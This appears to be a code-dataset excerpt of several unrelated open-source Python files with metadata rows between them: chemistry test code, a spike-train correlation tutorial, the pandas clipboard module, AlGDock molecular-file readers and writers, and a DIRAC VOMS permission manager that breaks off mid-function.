def check_spline_mono_decr(spline):
t = np.arange(0, spline.rtransform.npoint, 0.1)
x = spline.rtransform.radius(t)
y = spline(x)
i = (abs(y) < 1e-10).nonzero()[0][0]
y = y[:i]
assert ((y[1:] - y[:-1])/y[:-1]).min() < 1e-9
def test_get_spline():
padb = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=1)
spline = padb.get_spline(6)
check_spline_pop(spline, 6.0)
check_spline_record(spline, padb.get_record(6, 0))
check_spline_mono_decr(spline)
spline = padb.get_spline(6, -1)
check_spline_pop(spline, 7.0)
check_spline_record(spline, padb.get_record(6, -1))
check_spline_mono_decr(spline)
spline = padb.get_spline(6, {0:0.5, -1:0.5})
check_spline_pop(spline, 6.5)
check_spline_mono_decr(spline)
spline = padb.get_spline(1, {0:0.5})
check_spline_pop(spline, 0.5)
check_spline_mono_decr(spline)
def test_get_spline_pseudo():
padb = get_proatomdb_cp2k()
spline = padb.get_spline(8)
check_spline_pop(spline, 6.0)
check_spline_record(spline, padb.get_record(8, 0))
spline = padb.get_spline(8, -1)
check_spline_pop(spline, 7.0)
check_spline_record(spline, padb.get_record(8, -1))
spline = padb.get_spline(8, {0:0.5, -1:0.5})
check_spline_pop(spline, 6.5)
spline = padb.get_spline(14)
check_spline_pop(spline, 4.0)
check_spline_record(spline, padb.get_record(14, 0))
def test_compact():
padb = get_proatomdb_cp2k()
padb.compact(0.1)
assert padb.get_rgrid(8).size < 100
assert padb.get_rgrid(14).size < 100
def test_normalize():
padb = get_proatomdb_cp2k()
padb.compact(0.1)
padb.normalize()
for number in padb.get_numbers():
rgrid = padb.get_rgrid(number)
for charge in padb.get_charges(number):
r = padb.get_record(number, charge)
nel = rgrid.integrate(r.rho)
nel_integer = r.pseudo_number - charge
assert abs(nel - nel_integer) < 1e-10
def test_empty_proatom():
padb = get_proatomdb_cp2k()
assert (padb.get_rho(8, {}) == 0.0).all()
def test_io_atdens():
padb = ProAtomDB.from_file(context.get_fn('test/pro.atdens'))
assert padb.get_numbers() == [16]
assert padb.get_charges(16) == [3, 2]
r = padb.get_record(16, 3)
assert abs(r.rho[0] - 0.2628105459E+04) < 1e-5
assert abs(r.rho[-1] - 0.1998952826E-16) < 1e-5
s = padb.get_spline(16, 3)
assert abs(s(np.array([0.0])) - 2661.68659449) < 1e-5
radii = r.rgrid.rtransform.get_radii()
assert radii[0] == 0.5216488380E-03
assert abs(radii[-1] - 20) < 1e-14
assert abs(radii[1] - 0.5442350204E-03) < 1e-8
assert abs(r.rgrid.integrate(r.rho) - 13) < 1e-3
# check the basics of the get_rho method (charge)
rho1 = padb.get_rho(16, 3)
rho2, deriv = padb.get_rho(16, 3, do_deriv=True)
assert (rho1 == rho2).all()
assert deriv is None
# check the basics of the get_rho method (dict)
rho1 = padb.get_rho(16, {3:1})
rho2, deriv = padb.get_rho(16, {3:1}, do_deriv=True)
assert (rho1 == rho2).all()
assert deriv is None
|
crisely09/horton
|
horton/part/test/test_proatomdb.py
|
Python
|
gpl-3.0
| 8,738
|
[
"CP2K"
] |
777e0a54f81ccbc99bd034740e2b769df920e751ff01c3e969d8aae788efebbd
|
import numpy as np
import pylab as pl
'''
This script contains all the functions you will use for the assignments.
Have a look at them and don't be afraid to ask, if you have questions about the code here!
'''
'''
Function to compute the correlation coefficient given a certain time-window [time_window in ms]
Note, that the spiketrains are given as vectors containing the firing times of each neuron.
Recording time T in seconds!
'''
def corr_coeff(spktr1, spktr2, time_window,T):
dt = 0.1 # time resolution [ms]
t = np.arange(0,1000*T+dt,dt)
# time window is implemented as a boxkernel of length time_window/dt
boxkernel = np.ones(np.ceil(time_window/dt))
# create arrays that contain 1s for spiketimes, and 0s otherwise
hist1 = np.zeros(len(t))
hist1[(spktr1*1000/dt).astype(int)]=1
hist2 = np.zeros(len(t))
hist2[(spktr2*1000/dt).astype(int)]=1
# convolution with the boxkernel is an efficient way to count the events in the
# interval time_window
n1 = np.convolve(hist1,boxkernel,'same')
n2 = np.convolve(hist2,boxkernel,'same')
# use a built-in numpy function to compute the correlation coefficient between the
# count sequences:
rho = np.corrcoef(n1,n2)[0,1]
return rho
# cross-covariance function
def cross_cov(spktr1, spktr2,T,plot=True):
# reverse the order if spktr2 is longer, such that we always loop over the shorter
# array later. This speeds up the code.
if len(spktr1)>len(spktr2):
spktr1,spktr2 = spktr2, spktr1
reverse = True # set a flag, so we can later switch back to the original order
else:
reverse = False
Delta_t = np.array([])
# collect all the timedifferences
for k in range(len(spktr1)):
Delta_t = np.append(Delta_t, spktr2-spktr1[k])
if reverse:
Delta_t=-Delta_t
meanrate_1 = len(spktr1)/T
meanrate_2 = len(spktr2)/T
dt = 0.001 #[s]
t = np.arange(-T,T+dt,dt)
# bin the time differences
crosscov = np.histogram(Delta_t, len(t),(-T,T))[0]/(dt*T)
# subtract mean rates, the last term is to cancel boundary effects
crosscov = crosscov-meanrate_1*meanrate_2*(T-np.abs(t))/T
if plot:
pl.figure()
pl.plot(t,crosscov)
pl.title('Cross covariance function')
pl.xlabel('$\Delta$t [s]')
pl.xlim([-1,1])
pl.ylabel('C($\Delta$t)')
pl.grid(True)
pl.show()
return t, crosscov
'''
This function generates a Poissonian spiketrain. It takes as inputs
the mean rate and the recording interval T.
The code generates random numbers from an exponential distribution
in order to arrive at the next spiketime by adding the random number to
the last spiketime, making use of the fact, that inter-event-intervals
in a Poisson process follow an exponential distribution.
'''
def poisson_generator(rate,T):
try:
N_events = np.random.poisson(rate*T)
except:
raise Exception('rate has to be a nonnegative number!')
return T*np.sort(np.random.rand(N_events))
'''
plots the spiketrains. takes as input a tuple containing the spiketrains, so
don't forget the extra brackets
'''
def spiketrainplot(spiketrains, interval = [0,50]):
n = len(spiketrains)
pl.figure(figsize=(10,n+1.))
for i,add_sp in enumerate(spiketrains):
pl.plot(add_sp,-(i+1)*np.ones(len(add_sp)),'|',markersize=50.);
pl.ylim([-n-0.5,-0.5])
yticklabels=['Spiketrain 1']
for i in range(2,n+1):
yticklabels=np.append('Spiketrain '+str(i),yticklabels)
pl.subplots_adjust(left=0.15, right=0.95, top=1-0.3/(n+1.), bottom=0.7/(n+1.))
pl.yticks(range(-n,0),yticklabels)
pl.xlabel('Time [s]')
pl.xlim(interval)
'''
A simple implementation of a leaky integrate-and-fire-neuron. The
input arguments are the input-spiketrain, the recording time T, and
as optional argument an input signal, and the threshold potential v_thr.
The output is again an array of firing-times.
'''
def simple_neuron(spktr,T,signal=0,Jsyn=5.):
v_0 = -60 # resting potential
v_thr = -40 # threshold potential
tau = 25. #membrane time constant [ms]
v = v_0 # initial membrane potential
dt = 0.1 # timestep of the integration [ms]
time = np.arange(dt/1000.,T+dt/1000.,dt/1000.)
# make sure the input firingtimes are in chronological order:
spktr=np.append(np.sort(spktr),T+dt/1000)
output=np.array([]) # initialize output firingtimes
count=0 # variable to count input spikes
for t in time:
v=v+dt/tau*(-(v-v_0)+signal) # forward Euler
if t>spktr[count]: # input spike condition
v+=Jsyn
count+=1
# if threshold is reached, reset to resting potential
# and record output firing time
if v>v_thr:
v=v_0
output=np.append(output,t)
return output
'''
The following function simulates two neurons during the presentation of
a grating with orientation defined by the variable stimulus (angle is given
in radians, not degrees!).
phi_pref1 and phi_pref2 are the prefered orientations of the two neurons.
c specifies the noise correlations in the input to the two neurons.
The number of trials is set to 100 by default.
outputrate is a 2 x n_trials array with each row containing the rate of
each neuron for all the trials
'''
def orientation_tuning(phi_pref1, phi_pref2, stimulus, c, n_trials=50):
amplitude = 5.
signal1 = amplitude*np.exp(-np.sin(phi_pref1-stimulus)**2) # compute stimulus-dependent
signal2 = amplitude*np.exp(-np.sin(phi_pref2-stimulus)**2) # input signals
outputrate=np.zeros((2,n_trials))
T=1. # trial duration
rate = 100. # rate of background input
for i in range(n_trials):
# create correlated background input
s1 = poisson_generator(rate*(1-c),T)
s2 = poisson_generator(rate*(1-c),T)
sc = poisson_generator(rate*c,T)
sp1 = np.append(s1,sc)
sp2 = np.append(s2,sc)
# compute output of the neurons
neuron1 = simple_neuron(sp1,T,signal1)
neuron2 = simple_neuron(sp2,T,signal2)
outputrate[0,i] = len(neuron1)/T
outputrate[1,i] = len(neuron2)/T
# bootstrapping
n_bootstrap = 500
outputrate_bootstrapped=np.zeros((2,n_bootstrap))
idx = np.random.randint(n_trials,size=(int(n_trials/5),n_bootstrap));
outputrate_bootstrapped[0,:]=np.mean(np.take(outputrate[0,:],idx),0)
outputrate_bootstrapped[1,:]=np.mean(np.take(outputrate[1,:],idx),0)
#outputrate_bootstrapped[1,:]=np.mean(np.random.choice(outputrate[1,:],(int(n_trials/5),n_bootstrap)),0)
return outputrate_bootstrapped
|
h-mayorquin/camp_india_2016
|
tutorials/Network Correlations/network_correlations.py
|
Python
|
mit
| 6,684
|
[
"NEURON"
] |
13f9cb6ff6ba511bb285fd8da432ed10ca65c7dad5e95f8976c7656f0e52a867
|
import subprocess
from .exceptions import PyperclipException
from pandas.compat import PY2, text_type
EXCEPT_MSG = """
Pyperclip could not find a copy/paste mechanism for your system.
For more information, please visit https://pyperclip.readthedocs.org """
def init_osx_clipboard():
def copy_osx(text):
p = subprocess.Popen(['pbcopy', 'w'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text.encode('utf-8'))
def paste_osx():
p = subprocess.Popen(['pbpaste', 'r'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode('utf-8')
return copy_osx, paste_osx
def init_gtk_clipboard():
import gtk
def copy_gtk(text):
global cb
cb = gtk.Clipboard()
cb.set_text(text)
cb.store()
def paste_gtk():
clipboardContents = gtk.Clipboard().wait_for_text()
# for python 2, returns None if the clipboard is blank.
if clipboardContents is None:
return ''
else:
return clipboardContents
return copy_gtk, paste_gtk
def init_qt_clipboard():
# $DISPLAY should exist
# Try to import from qtpy, but if that fails try PyQt5 then PyQt4
try:
from qtpy.QtWidgets import QApplication
except ImportError:
try:
from PyQt5.QtWidgets import QApplication
except ImportError:
from PyQt4.QtGui import QApplication
app = QApplication.instance()
if app is None:
app = QApplication([])
def copy_qt(text):
cb = app.clipboard()
cb.setText(text)
def paste_qt():
cb = app.clipboard()
return text_type(cb.text())
return copy_qt, paste_qt
def init_xclip_clipboard():
def copy_xclip(text):
p = subprocess.Popen(['xclip', '-selection', 'c'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text.encode('utf-8'))
def paste_xclip():
p = subprocess.Popen(['xclip', '-selection', 'c', '-o'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode('utf-8')
return copy_xclip, paste_xclip
def init_xsel_clipboard():
def copy_xsel(text):
p = subprocess.Popen(['xsel', '-b', '-i'],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=text.encode('utf-8'))
def paste_xsel():
p = subprocess.Popen(['xsel', '-b', '-o'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
return stdout.decode('utf-8')
return copy_xsel, paste_xsel
def init_klipper_clipboard():
def copy_klipper(text):
p = subprocess.Popen(
['qdbus', 'org.kde.klipper', '/klipper', 'setClipboardContents',
text.encode('utf-8')],
stdin=subprocess.PIPE, close_fds=True)
p.communicate(input=None)
def paste_klipper():
p = subprocess.Popen(
['qdbus', 'org.kde.klipper', '/klipper', 'getClipboardContents'],
stdout=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
# Workaround for https://bugs.kde.org/show_bug.cgi?id=342874
# TODO: https://github.com/asweigart/pyperclip/issues/43
clipboardContents = stdout.decode('utf-8')
# even if blank, Klipper will append a newline at the end
assert len(clipboardContents) > 0
# make sure that newline is there
assert clipboardContents.endswith('\n')
if clipboardContents.endswith('\n'):
clipboardContents = clipboardContents[:-1]
return clipboardContents
return copy_klipper, paste_klipper
def init_no_clipboard():
class ClipboardUnavailable(object):
def __call__(self, *args, **kwargs):
raise PyperclipException(EXCEPT_MSG)
if PY2:
def __nonzero__(self):
return False
else:
def __bool__(self):
return False
return ClipboardUnavailable(), ClipboardUnavailable()
|
louispotok/pandas
|
pandas/io/clipboard/clipboards.py
|
Python
|
bsd-3-clause
| 4,244
|
[
"VisIt"
] |
3699ea4cc3934d7d506bae8190fbaa093df8a0efffc5e3f775a5065ac453d804
|
import os
import numpy as np
import cPickle as pickle
import gzip
def load_pkl_gz(FN):
if os.path.isfile(FN) and os.path.getsize(FN) > 0:
F = gzip.open(FN, 'r')
try:
data = pickle.load(F)
except:
print(' error loading ' + FN)
F.close()
return None
F.close()
return data
else:
return None
def write_pkl_gz(FN, data):
F = gzip.open(FN, 'w')
pickle.dump(data, F)
F.close()
return (" wrote to " + os.path.basename(FN))
class Grid:
"""
Class to read and write alchemical grids.
Data is a dictionary with
spacing - the grid spacing, in Angstroms.
counts - the number of points in each dimension.
vals - the values.
All are numpy arrays.
"""
def __init__(self):
pass
def read(self, FN, multiplier=None):
"""
Reads a grid in dx or netcdf format
The multiplier affects the origin and spacing.
"""
if FN is None:
raise Exception('File is not defined')
elif FN.endswith('.dx') or FN.endswith('.dx.gz'):
data = self._read_dx(FN)
elif FN.endswith('.nc'):
data = self._read_nc(FN)
else:
raise Exception('File type not supported')
if multiplier is not None:
data['origin'] = multiplier * data['origin']
data['spacing'] = multiplier * data['spacing']
return data
def _read_dx(self, FN):
"""
Reads a grid in dx format
"""
if FN.endswith('.dx'):
F = open(FN, 'r')
else:
import gzip
F = gzip.open(FN, 'r')
# Read the header
line = F.readline()
while line.find('object') == -1:
line = F.readline()
header = {}
header['counts'] = [int(x) for x in line.split(' ')[-3:]]
for name in ['origin', 'd0', 'd1', 'd2']:
header[name] = [float(x) for x in F.readline().split(' ')[-3:]]
F.readline()
header['npts'] = int(F.readline().split(' ')[-3])
# Test to make sure the grid type is okay.
# These conditions are not absolultely essential,
# but they reduce the number of subtraction operations.
if not (header['d0'][1] == 0 and header['d0'][2] == 0
and header['d1'][0] == 0 and header['d1'][2] == 0
and header['d2'][0] == 0 and header['d2'][1] == 0):
raise Exception('Trilinear grid must be in original basis')
if not (header['d0'][0] > 0 and header['d1'][1] > 0
and header['d2'][2] > 0):
raise Exception('Trilinear grid must have positive coordinates')
# Read the data
vals = np.ndarray(shape=header['npts'], dtype=float)
index = 0
while index < header['npts']:
line = F.readline()[:-1]
items = [float(item) for item in line.split()]
vals[index:index + len(items)] = items
index = index + len(items)
F.close()
data = {
'origin':np.array(header['origin']), \
'spacing':np.array([header['d0'][0],header['d1'][1],header['d2'][2]]), \
'counts':np.array(header['counts']), \
'vals':vals}
return data
def _read_nc(self, FN):
"""
Reads a grid in netcdf format
"""
from netCDF4 import Dataset
grid_nc = Dataset(FN, 'r')
data = {}
for key in list(grid_nc.variables):
data[key] = np.array(grid_nc.variables[key][:][0][:])
grid_nc.close()
return data
def write(self, FN, data, multiplier=None):
"""
Writes a grid in dx or netcdf format.
The multiplier affects the origin and spacing.
"""
if multiplier is not None:
data_n = {
'origin': multiplier * data['origin'],
'counts': data['counts'],
'spacing': multiplier * data['spacing'],
'vals': data['vals']
}
else:
data_n = data
if FN.endswith('.nc'):
self._write_nc(FN, data_n)
elif FN.endswith('.dx') or FN.endswith('.dx.gz'):
self._write_dx(FN, data_n)
else:
raise Exception('File type not supported')
def _write_dx(self, FN, data):
"""
Writes a grid in dx format
"""
n_points = data['counts'][0] * data['counts'][1] * data['counts'][2]
if FN.endswith('.dx'):
F = open(FN, 'w')
else:
import gzip
F = gzip.open(FN, 'w')
F.write("""object 1 class gridpositions counts {0[0]} {0[1]} {0[2]}
origin {1[0]} {1[1]} {1[2]}
delta {2[0]} 0.0 0.0
delta 0.0 {2[1]} 0.0
delta 0.0 0.0 {2[2]}
object 2 class gridconnections counts {0[0]} {0[1]} {0[2]}
object 3 class array type double rank 0 items {3} data follows
""".format(data['counts'], data['origin'], data['spacing'], n_points))
for start_n in range(0, len(data['vals']), 3):
F.write(' '.join(['%6e' % c
for c in data['vals'][start_n:start_n + 3]]) + '\n')
F.write('object 4 class field\n')
F.write('component "positions" value 1\n')
F.write('component "connections" value 2\n')
F.write('component "data" value 3\n')
F.close()
def _write_nc(self, FN, data):
"""
Writes a grid in netcdf format
"""
n_points = data['counts'][0] * data['counts'][1] * data['counts'][2]
from netCDF4 import Dataset
grid_nc = Dataset(FN, 'w', format='NETCDF4')
grid_nc.createDimension('one', 1)
grid_nc.createDimension('n_cartesian', 3)
grid_nc.createDimension('n_points', n_points)
grid_nc.createVariable('origin', 'f8', ('one', 'n_cartesian'))
grid_nc.createVariable('counts', 'i8', ('one', 'n_cartesian'))
grid_nc.createVariable('spacing', 'f8', ('one', 'n_cartesian'))
grid_nc.createVariable('vals', 'f8', ('one', 'n_points'), zlib=True)
for key in data.keys():
grid_nc.variables[key][:] = data[key]
grid_nc.close()
def truncate(self, in_FN, out_FN, counts, multiplier=None):
"""
Truncates the grid at the origin and
with a limited number of counts per dimension
multiplier is for the values, not the grid scaling
"""
data_o = self.read(in_FN)
nyz_o = data_o['counts'][1] * data_o['counts'][2]
nz_o = data_o['counts'][2]
min_i = int(-data_o['origin'][0] / data_o['spacing'][0])
min_j = int(-data_o['origin'][1] / data_o['spacing'][1])
min_k = int(-data_o['origin'][2] / data_o['spacing'][2])
# vals = np.ndarray(shape=tuple(counts), dtype=float)
# for i in range(counts[0]):
# for j in range(counts[1]):
# for k in range(counts[2]):
# vals[i,j,k] = data_o['vals'][(i+min_i)*nyz_o + (j+min_j)*nz_o + (k+min_k)]
vals = np.array([[[
data_o['vals'][(i + min_i) * nyz_o + (j + min_j) * nz_o + (k + min_k)]
for k in range(counts[2])
] for j in range(counts[1])] for i in range(counts[0])])
if multiplier is not None:
vals = vals * multiplier
data_n = {'origin':np.array([0., 0., 0.]), \
'counts':counts, 'spacing':data_o['spacing'], 'vals':vals.flatten()}
self.write(out_FN, data_n)
class crd:
"""
Class to read and write AMBER coordinate/restart and trajectory files.
"""
def __init__(self):
pass
def read(self, FN, natoms=None, return_title=False, \
multiplier=None, trajectory=False):
"""
Reads an AMBER coordinate/restart or trajectory file.
If natoms is not none, then the coordinates will be split
into a list of natoms X 3 arrays.
The coordinates will be multiplied by multiplier.
"""
if not os.path.isfile(FN):
raise Exception('Coordinate file %s does not exist!' % FN)
if FN.endswith('.gz'):
import gzip
F = gzip.open(FN, 'r')
else:
F = open(FN, 'r')
dat = F.read().strip().split('\n')
F.close()
title = dat.pop(0) # Title
if len(dat[0].split()) > 1:
# VMD format (does not specify number of atoms)
crd = []
for line in dat:
crd = crd + [float(x) for x in line.split()]
crd = np.resize(crd, (len(crd) / 3, 3))
else:
# AMBER format
file_natoms = int(dat.pop(0)) # Number of atoms
if (natoms is not None) and (file_natoms != natoms):
print "Incorrect number of atoms in crd file"
return np.array([])
if trajectory:
w = 8 # For mdcrd
else:
w = 12 # For inpcrd
crd = []
for line in dat:
crd = crd + [float(line[x:x + w]) for x in range(0, len(line), w)]
crd = np.resize(crd, (len(crd) / 3, 3))
if multiplier is not None:
crd = multiplier * crd
if (natoms is not None):
crd = np.vsplit(crd, crd.shape[0] / natoms)
print " read %d configurations from %s" % (len(crd), FN)
if return_title:
return (crd, title)
else:
return crd
def write(self, FN, crd, title='', append=False, \
multiplier=None, trajectory=False):
"""
Writes an AMBER coordinate/restart or trajectory file
"""
if (append and os.path.isfile(FN)):
if FN.endswith('.gz'):
import gzip
F = gzip.open(FN, 'a')
else:
F = open(FN, 'a')
else:
if os.path.isfile(FN):
os.rename(FN, FN + '.BAK')
if FN.endswith('.gz'):
import gzip
F = gzip.open(FN, 'w')
else:
F = open(FN, 'w')
# Write the header
F.write(title + '\n') # Title
if not trajectory:
F.write('%d\n' % crd.shape[0])
if not trajectory:
flattened = np.vstack(crd).flatten()
if multiplier is not None:
flattened = multiplier * flattened
for n in range(0, len(flattened), 6):
F.write(''.join(['%12.7f' % val for val in flattened[n:n + 6]]) + '\n')
else:
for c in crd:
flattened = c.flatten()
if multiplier is not None:
flattened = multiplier * flattened
for n in range(0, len(flattened), 10):
F.write(''.join(['%8.3f' % val
for val in flattened[n:n + 10]]) + '\n')
F.close()
class dock6_mol2:
"""Handles mol2 from UCSF DOCK 6
Reads output files and writes similar mol2 files
"""
def __init__(self):
pass
def read(self, FN, reorder=None, multiplier=None):
confs = []
E = {}
if (FN is None) or (not os.path.isfile(FN)):
return (confs, E)
# Specifically to read output from UCSF dock6
if FN.endswith('.mol2'):
mol2F = open(FN, 'r')
elif FN.endswith('.mol2.gz'):
import gzip
mol2F = gzip.open(FN, 'r')
else:
raise Exception('Unknown file type')
models = mol2F.read().strip().split('########## Name:')
mol2F.close()
models.pop(0)
if len(models) > 0:
for line in models[0].split('\n'):
if line.startswith('##########'):
label = line[11:line.find(':')].strip()
E[label] = []
for model in models:
fields = model.split('<TRIPOS>')
conf = np.array([l.split()[2:5] for l in fields[2].split('\n')[1:-1]],
dtype=float)
if multiplier is not None:
conf = multiplier * conf
if reorder is not None:
conf = conf[reorder, :]
for line in fields[0].split('\n'):
if line.startswith('##########'):
label = line[11:line.find(':')].strip()
if not label in E.keys():
E[label] = [0] * len(confs)
E[label].append(float(line.split()[-1]))
confs.append(conf)
return (confs, E)
def write(self, templateFN, confs, FN, reorder=None, multiplier=None):
if (templateFN is None) or not os.path.isfile(templateFN):
raise Exception('Template required')
# Read the first model from the template
if templateFN.endswith('.mol2'):
mol2F = open(templateFN, 'r')
elif templateFN.endswith('.mol2.gz'):
import gzip
mol2F = gzip.open(templateFN, 'r')
else:
raise Exception('Template for mol2 is unknown file type')
template = mol2F.read().strip()
mol2F.close()
if template.find('########## Name:') > -1:
template = template.split('########## Name:')[1]
template = template[template.find('@<TRIPOS>'):]
header = template[template.find('@<TRIPOS>MOLECULE'
):template.find('@<TRIPOS>ATOM') + 14]
body = template[template.find('@<TRIPOS>ATOM') +
14:template.find('\n@<TRIPOS>BOND')].split('\n')
footer = template[template.find('\n@<TRIPOS>BOND'):] + '\n'
F = open(FN, 'w')
for conf in confs:
if multiplier is not None:
conf = multiplier * conf
if reorder is not None:
conf = conf[reorder, :]
F.write(header + \
'\n'.join([body[ind][:16] + \
''.join(['%10.4f'%x for x in conf[ind]]) + \
body[ind][46:] for ind in range(len(body))]) \
+ footer)
F.close()
class dcd:
"""
Class to write DCD files
"""
def __init__(self, molecule, ligand_atom_order=None, \
receptorConf=None, ligand_first_atom=0):
self.molecule = molecule
self.receptorConf = receptorConf
self.ligand_first_atom = ligand_first_atom
if ligand_atom_order is None:
self.ligand_atom_order = range(len(self.molecule.atoms))
else:
self.ligand_atom_order = ligand_atom_order
pass
def write(self,
FN,
confs,
includeLigand=True,
includeReceptor=False,
factor=10.0,
delta_t=0.1):
"""
Writes a DCD file for a trajectory.
If includeReceptor==True, the receptor coordinates are included.
"""
import MMTK
import MMTK_DCD # @UnresolvedImport
from Scientific import N
if not isinstance(confs, list):
confs = [confs]
if includeReceptor and (self.receptorConf is None):
raise Exception("Missing receptor configuration")
n_atoms = 0
if includeReceptor:
receptor_x0 = factor * self.receptorConf[:self.ligand_first_atom, 0]
receptor_y0 = factor * self.receptorConf[:self.ligand_first_atom, 1]
receptor_z0 = factor * self.receptorConf[:self.ligand_first_atom, 2]
receptor_x1 = factor * self.receptorConf[self.ligand_first_atom:, 0]
receptor_y1 = factor * self.receptorConf[self.ligand_first_atom:, 1]
receptor_z1 = factor * self.receptorConf[self.ligand_first_atom:, 2]
n_atoms += self.receptorConf.shape[0]
if includeLigand:
n_atoms += len(self.molecule.atoms)
n_snaps = len(confs)
fd = MMTK_DCD.writeOpenDCD(FN, n_atoms, n_snaps, 1, 1, delta_t)
if includeReceptor and includeLigand:
for array in confs:
array = factor * array
x = N.concatenate(
(receptor_x0, N.take(array[:, 0], self.ligand_atom_order),
receptor_x1)).astype(N.Float16)
y = N.concatenate(
(receptor_y0, N.take(array[:, 1], self.ligand_atom_order),
receptor_y1)).astype(N.Float16)
z = N.concatenate(
(receptor_z0, N.take(array[:, 2], self.ligand_atom_order),
receptor_z1)).astype(N.Float16)
MMTK_DCD.writeDCDStep(fd, x, y, z)
MMTK_DCD.writeCloseDCD(fd)
elif includeLigand:
for array in confs:
array = factor * array
x = N.take(array[:, 0], self.ligand_atom_order).astype(N.Float16)
y = N.take(array[:, 1], self.ligand_atom_order).astype(N.Float16)
z = N.take(array[:, 2], self.ligand_atom_order).astype(N.Float16)
MMTK_DCD.writeDCDStep(fd, x, y, z)
MMTK_DCD.writeCloseDCD(fd)
else:
x = N.concatenate((receptor_x0, receptor_x1)).astype(N.Float16)
y = N.concatenate((receptor_y0, receptor_y1)).astype(N.Float16)
z = N.concatenate((receptor_z0, receptor_z1)).astype(N.Float16)
MMTK_DCD.writeDCDStep(fd, x, y, z)
MMTK_DCD.writeCloseDCD(fd)
class prmtop:
"""
Class to read AMBER prmtop files
"""
def __init__(self):
pass
def read(self, FN, varnames=['RESIDUE_LABEL', 'RESIDUE_POINTER']):
"""
Reads an AMBER prmtop file, returning a dictionary
"""
if not os.path.isfile(FN):
raise Exception('prmtop file %s does not exist!' % FN)
if FN.endswith('.gz'):
import gzip
F = gzip.open(FN, 'r')
else:
F = open(FN, 'r')
data = F.read().split('%FLAG ')
F.close()
prmtop = {}
for record in data:
name = record[:record.find('\n')].strip()
if name in varnames:
prmtop[name] = self._load_record(record)
return prmtop
def _load_record(self, record):
items = []
lines = record.split('\n')
lines.pop(0) # Name
FORMAT = lines.pop(0).strip()[8:-1] # Format
if FORMAT.find('a') > -1: # Text
w = int(FORMAT[FORMAT.find('a') + 1:])
for line in lines:
items = items + [line[x:x + w] for x in range(0, len(line), w)]
return np.array(items)
elif FORMAT.find('I') > -1: # Integer
w = int(FORMAT[FORMAT.find('I') + 1:])
for line in lines:
items = items + [int(line[x:x + w]) for x in range(0, len(line), w)]
return np.array(items, dtype=int)
elif FORMAT.find('E') > -1: # Scientific
w = int(FORMAT[FORMAT.find('E') + 1:FORMAT.find('.')])
for line in lines:
items = items + [float(line[x:x + w]) for x in range(0, len(line), w)]
return np.array(items, dtype=float)
|
CCBatIIT/AlGDock
|
AlGDock/IO.py
|
Python
|
mit
| 17,074
|
[
"Amber",
"NetCDF",
"VMD"
] |
cdb57cea45c3deef4bc7e8a47bd9a960a63502dbb09b7b060a10a178856a7283
|
""" VOMSSecurityManager class implements access permissions based on VOMS roles
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import os
import datetime
from DIRAC import S_OK, S_ERROR
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getAllGroups, getGroupOption
from DIRAC.DataManagementSystem.DB.FileCatalogComponents.SecurityManager.SecurityManagerBase \
import SecurityManagerBase, _readMethods, _writeMethods
from DIRAC.Core.Utilities.ReturnValues import returnSingleResult
class VOMSSecurityManager(SecurityManagerBase):
""" This class implements a 3-level POSIX permission, wrapping up
the DIRAC group into VOMS roles
"""
def __init__(self, database=False):
super(VOMSSecurityManager, self).__init__(database=database)
# voms role : [dirac groups that have it]
self.vomsRoles = {}
# dirac group : voms role it has
self.diracGroups = {}
# Lifetime of the info in the two dictionaries
self.CACHE_TIME = datetime.timedelta(seconds=600)
self.__buildRolesAndGroups()
def __buildRolesAndGroups(self):
""" Rebuild the cache dictionary for VOMS roles and DIRAC Groups"""
self.lastBuild = datetime.datetime.now()
allGroups = getAllGroups()
for grpName in allGroups:
vomsRole = getGroupOption(grpName, 'VOMSRole')
if vomsRole:
self.diracGroups[grpName] = vomsRole
self.vomsRoles.setdefault(vomsRole, []).append(grpName)
def __getVomsRole(self, grpName):
""" Returns the VOMS role of a given DIRAC group
:param grpName:
:returns: VOMS role, or None
"""
if (datetime.datetime.now() - self.lastBuild) > self.CACHE_TIME:
self.__buildRolesAndGroups()
return self.diracGroups.get(grpName)
def __getDiracGroups(self, vomsRole):
""" Returns all the DIRAC groups that have a given VOMS role
:param vomsRole:
:returns: list of groups, empty if not exist
"""
if (datetime.datetime.now - self.lastBuild) > self.CACHE_TIME:
self.__buildRolesAndGroups()
return self.vomsRoles.get(vomsRole, [])
def __shareVomsRole(self, grpName, otherGrpName):
""" Returns True if the two DIRAC groups have the same VOMS role"""
vomsGrp = self.__getVomsRole(grpName)
vomsOtherGrp = self.__getVomsRole(otherGrpName)
# The voms group cannot be None
return vomsGrp and vomsOtherGrp and (vomsGrp == vomsOtherGrp)
def __isNotExistError(self, errorMsg):
""" Returns true if the errorMsg means that the file/directory does not exist """
for possibleMsg in ['not exist', 'not found', 'No such file or directory']:
if possibleMsg in errorMsg:
return True
return False
def __getFilePermission(self, path, credDict, noExistStrategy=None):
""" Checks POSIX permission for a file using the VOMS roles.
That is, if the owner group of the file shares the same vomsRole as the requesting user,
we check the permission as if the request was done with the real owner group.
:param path : file path (string)
:param credDict : credential of the user
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
:returns S_OK structure with a dictionary ( Read/Write/Execute : True/False)
"""
if not path:
return S_ERROR('Empty path')
# We check what is the group stored in the DB for the given path
res = returnSingleResult(self.db.fileManager.getFileMetadata([path]))
if not res['OK']:
# If the error is not due to the directory not existing, we return
if not self.__isNotExistError(res['Message']):
return res
# From now on, we know that the error is due to the file not existing
# If we have no strategy regarding non existing files, then just return the error
if noExistStrategy is None:
return res
# Finally, follow the strategy
return S_OK(dict.fromkeys(['Read', 'Write', 'Execute'], noExistStrategy))
#===========================================================================
# # This does not seem necessary since we add the OwnerGroup in the query behind the scene
# origGrp = 'unknown'
# res = self.db.ugManager.getGroupName( res['Value']['GID'] )
# if res['OK']:
# origGrp = res['Value']
#===========================================================================
origGrp = res['Value'].get('OwnerGroup', 'unknown')
# If the two group share the same voms role, we do the query like if we were
# the group stored in the DB
